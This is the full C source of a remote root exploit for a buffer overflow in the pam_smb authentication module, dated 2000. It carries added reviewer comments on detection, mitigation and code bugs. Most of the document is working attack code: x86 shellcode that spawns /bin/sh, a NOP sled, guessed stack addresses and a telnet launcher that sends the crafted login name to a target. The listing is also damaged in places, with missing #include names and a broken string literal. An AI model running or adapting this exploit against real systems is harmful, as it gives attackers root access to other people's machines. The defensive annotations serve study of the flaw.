Based on Shaun Clowes' finding, I developed a remote root exploit for the Linux pam_smb bug. Below is the source code of the exploit.
/*
 * PAM_SMB REMOTE ROOT EXPLOIT
 * by bibble -- bibble@263.net Oct 4, Y2k
 *
 * test system: linux suse 6.3
 * affected system: linux suse 6.2 6.3 6.4 7.0(but not default package)
 * other linux systems include pam_smb package
 *
 * The Pluggable Authentication Module (PAM) system is a means by which
 * programs can perform services relating to user authentication and account
 * maintenance. Details see:
 * http://www.kernel.org/pub/linux/libs/pam/Linux-PAM-html/pam.html
 *
 * pam_smb is a PAM module which allows authentication of UNIX users using
 * an NT server. Versions 1.1.5 and before contain a buffer overflow that
 * would allow a remote attacker to gain root access on the target host,
 * provided that the target host has the module installed and configured.
 *
 * If remote system's login service is authenticated by pam_smb, that is the
 * /etc/pam.conf file includes a line like:
 * login auth .. /lib/security/pam_smb_auth.so ..
 * or the /etc/pam.d/login file includes a line like:
 * auth .. /lib/security/pam_smb_auth.so ..,
 * the system can be controlled remotely by below exploit code.
 *
 * Thanks: Shaun Clowes who found this bug
 *
 * THIS CODE IS FOR EDUCATIONAL PURPOSE ONLY AND I ACCEPT NO RESPONSIBILITY
 * FOR THE USE OF IT
 *
 */

/*
 * Reviewer notes (defensive reading of the code below):
 *  - The only thing sent to the target is a login name: main() builds a
 *    LENGTH-byte name out of a NOP sled, the payload and repeated copies of a
 *    guessed stack address, and hands it to telnet's -l option.  The visible
 *    artifact on the receiving side is therefore an abnormally long user name
 *    containing non-printable bytes arriving at login/pam_smb -- confirm
 *    against what the target's auth logging actually records.
 *  - Mitigation, per the header above: a pam_smb release newer than 1.1.5,
 *    or not routing login authentication through pam_smb_auth.so.
 */

/* NOTE: the header names were lost when this listing was extracted.  The
 * functions used below are declared in <stdio.h> (fprintf, printf),
 * <stdlib.h> (exit, strtoul, atoi), <string.h> (strlen, strcpy, strncat,
 * strncpy, memset) and <unistd.h> (getopt, optarg, optind, execve). */
#include
#include
#include

/* Size of the crafted login name, including the trailing CR and NUL. */
#define LENGTH 400
/* ADDRESS expands to SUSE63 at its point of use, so defining SUSE63 after
 * ADDRESS is fine. */
#define ADDRESS SUSE63
/* Guessed stack address for the test system (SuSE 6.3); overridable with -a. */
#define SUSE63 0xbfff6990
/* Subtracted from the address before it is written into the buffer;
 * overridable with -o. */
#define OFFSET 256

/* Two-byte x86 self-jump (jmp to itself).  Only referenced by commented-out
 * code in main(); presumably a stand-in payload used while debugging. */
unsigned char loop[] = "\xeb\xfe";

/* x86 Linux payload: ends in the string "/bin/sh" and invokes the kernel via
 * int 0x80 (\xcd\x80).  Contains no NUL byte, so strlen() on it is the full
 * payload length. */
unsigned char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/*
 * Print the command-line synopsis to stderr.
 *
 * s: program name (argv[0]).
 *
 * The second string literal is split across a line break in the listing as
 * extracted; that break is reproduced here unchanged.
 */
void usage(char *s){
    fprintf(stderr, "Usage: %s [-a address] [-o offset]\n", s);
    fprintf(stderr, " -? 
for this help\n");
}

/* Number of leading NOP bytes written before the address copies start; it
 * also sets the 4-byte alignment of those copies (index 3, 7, 11, ...). */
#define ALGN 3

/*
 * Entry point.
 *
 * Usage: prog [-a address] [-o offset] host
 *   -a  stack address in hex (default ADDRESS)
 *   -o  decimal offset subtracted from the address (default OFFSET)
 *
 * Builds the LENGTH-byte login name in user[], prefixes it with "-l " and
 * replaces the current process with /usr/bin/telnet, so nothing after the
 * execve() call runs on success.
 *
 * Returns 0 (also when execve() fails, since its return value is not
 * checked).
 */
int main(int argc, char **argv)
{
    /* ruser holds "-l " + user; host is a fixed 20-byte copy of argv[optind]. */
    char user[LENGTH], ruser[LENGTH+3], host[20];
    char *arg[4];
    unsigned long sp;
    long addr;
    int offset = OFFSET;
    int i, j, c;

    printf("\nRemote exploit for pam_smb authenticated module which is used by login\n");
    printf("bibble -- bibble@263.net Oct 4, 2000\n\n");

    if (argc < 2) {
        usage(argv[0]);
        exit(0);
    }

    sp = (unsigned long) ADDRESS;

    /* getopt() returns -1 at the end of the options; comparing against EOF
     * relies on EOF being -1, which holds on the platforms this targets. */
    while ((c = getopt(argc, argv, "a:o:")) != EOF)
        switch (c) {
        case 'a':
            /* Hex address; the end pointer is stored back into optarg, which
             * is harmless since optarg is not read again here. */
            sp = strtoul(optarg, &optarg, 16);
            break;
        case 'o':
            offset = atoi(optarg);
            break;
        case '?':
            /* getopt() reports an unknown option as '?'. */
            usage(argv[0]);
            exit(0);
        }

    /* The remaining non-option argument is the host. */
    if (!argv[optind]) {
        usage(argv[0]);
        exit(0);
    }

    addr = sp - offset;

    /* Pass 1: ALGN NOPs, then the whole buffer filled with little-endian
     * copies of addr, 4 bytes per iteration. */
    for (i = 0; i < ALGN; i++)
        user[i] = 0x90;

    /* NOTE(review): with ALGN == 3 and LENGTH == 400, i takes the values
     * 3, 7, ..., 399, so the final iteration writes user[399..402] -- three
     * bytes past the end of user[] (undefined behaviour). */
    for (; i < LENGTH; i += 4) {
        user[i ] = addr & 0x000000ff;
        user[i+1] = (addr & 0x0000ff00) >> 8;
        user[i+2] = (addr & 0x00ff0000) >> 16;
        user[i+3] = (addr & 0xff000000) >> 24;
    }

    /* Pass 2: overwrite the first half of the buffer with a NOP sled followed
     * by the payload; the address copies from pass 1 remain in the second
     * half.  (int i is compared with a size_t here -- signed/unsigned
     * comparison, benign for these values.) */
    for (i = 0; i < (LENGTH - strlen(shellcode))/2; i++)
        user[i] = 0x90;

    for (j = 0; j < strlen(shellcode); i++, j++)
        user[i] = shellcode[j];

    /* Kept from the original: substitutes the self-jump for the payload,
     * presumably to verify control of execution without running a shell. */
    /*
    for (j = 0; j < strlen(loop); i++, j++)
        user[i] = loop[j];
    */

    /* One NOP after the payload, then a CR just before the NUL terminator.
     * The code does not say why the CR is needed. */
    user[i] = 0x90;
    user[LENGTH-1] = '\0';
    user[LENGTH-2] = 0x0d;

    /* Kept from the original: debug dump of the buffer as text and hex. */
    /*
    printf("%s\n",user);
    for (i = 0; i < LENGTH; i++) {
        unsigned char u = user[i];
        printf("%02X",u);
    }
    printf("\n");
    */

    /* NOTE(review): "%x" is given a long (should be "%lx"), and "0x%d" prints
     * the offset in decimal behind a hex prefix, so the printed offset is
     * misleading. */
    printf("Address:\t0x%x\tOffset:\t0x%d\n", addr, offset);

    /* user[] is NUL-terminated at LENGTH-1, so at most LENGTH-1 bytes are
     * appended and ruser (LENGTH+3 bytes) has room for the terminator. */
    strcpy(ruser, "-l ");
    strncat(ruser, user, LENGTH);

    /* NOTE(review): strncpy() with a count equal to sizeof host leaves host
     * unterminated when the argument is 20 or more characters long; the
     * preceding memset() does not help in that case. */
    memset(host, 0, 20);
    strncpy(host, argv[optind], 20);

    /* argv for telnet: "-l <name>" supplies the remote login name. */
    arg[0] = "/usr/bin/telnet"; /* use your PATH of telnet */
    arg[1] = ruser;
    arg[2] = host;
    arg[3] = NULL;

    printf("Injecting ShellCode ...\n");
    /* Replaces this process with telnet, with an empty environment.  The
     * return value is ignored, so a missing/unexecutable telnet binary falls
     * through to the return below with no error message. */
    execve(arg[0], arg, NULL);

    return(0);
}